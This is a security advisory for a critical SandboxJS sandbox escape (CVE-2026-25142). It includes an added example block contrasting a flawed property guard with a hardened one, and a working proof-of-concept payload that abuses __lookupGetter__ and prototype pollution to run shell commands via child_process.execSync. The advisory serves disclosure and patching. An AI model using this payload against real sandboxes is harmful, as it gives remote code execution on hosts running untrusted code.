CRITICAL 10.0 npm
SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE
GHSA-9p4w-fq8m-2hp7 · CVE-2026-25142
Description
Summary
SandboxJS does not properly restrict __lookupGetter__, which can be used to obtain prototypes and, from there, to escape the sandbox and achieve remote code execution.
Details
The Object prototype, which contains __lookupGetter__, is properly protected, but the special case for accessing function properties bypasses the prototype chain checks, including the check for the root Object prototype.
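The bypass described above, modelled as an added example (not SandboxJS code and not the project's fix): a property guard that walks the prototype chain, with a function special case shown beside a version that applies the same check to every receiver. DENY, ownerOf, checkChain, flawedGet, hardenedGet, attempt and demo are hypothetical names, and the policy is constructed for illustration.

```javascript
// Constructed policy: Object.prototype members sandboxed code must never read.
const DENY = new Map([[Object.prototype, new Set([
  "__proto__", "__lookupGetter__", "__lookupSetter__",
  "__defineGetter__", "__defineSetter__",
])]]);

// Find the object on the prototype chain that actually defines `key`.
function ownerOf(target, key) {
  for (let o = Object(target); o !== null; o = Object.getPrototypeOf(o)) {
    if (Object.prototype.hasOwnProperty.call(o, key)) return o;
  }
  return null;
}

// Throw when `key` resolves to a denied member of a protected prototype.
function checkChain(target, key) {
  const owner = ownerOf(target, key);
  if (owner && DENY.get(owner)?.has(key)) {
    throw new Error(`blocked: ${String(key)}`);
  }
}

// Flawed shape: function receivers take a shortcut that never reaches the
// chain check, so inherited Object.prototype members leak through any function.
function flawedGet(target, key) {
  if (typeof target === "function") return target[key];
  checkChain(target, key);
  return target[key];
}

// Hardened shape: the chain check runs for every receiver, functions included.
function hardenedGet(target, key) {
  checkChain(target, key);
  return target[key];
}

// Report the type of the value returned, or the guard's error message.
function attempt(fn) {
  try { return typeof fn(); } catch (e) { return e.message; }
}

// Same lookup through a plain object, a function, and the hardened guard.
function demo() {
  return {
    viaObject: attempt(() => flawedGet({}, "__lookupGetter__")),
    viaFunction: attempt(() => flawedGet(Object.toString, "__lookupGetter__")),
    hardened: attempt(() => hardenedGet(Object.toString, "__lookupGetter__")),
  };
}
console.log(demo());
```

Ordinary function properties such as name and call still resolve under hardenedGet, because their owner is the function itself or Function.prototype rather than a denied member of Object.prototype.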
PoC
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
const payload = `
let getProto = Object.toString.__lookupGetter__("__proto__")
let m = getProto.call(new Map());
m.has = isFinite;
console.log(
isFinite.constructor(
"return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
)(),
);`
sb.compile(payload)().run();
Impact
Prototype Pollution -> RCE
References
- WEB https://github.com/nyariv/SandboxJS/security/advisories/GHSA-9p4w-fq8m-2hp7
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2026-25142
- WEB https://github.com/nyariv/SandboxJS/commit/75c8009db32e6829b0ad92ca13bf458178442bd3
- PACKAGE https://github.com/nyariv/SandboxJS
- WEB https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398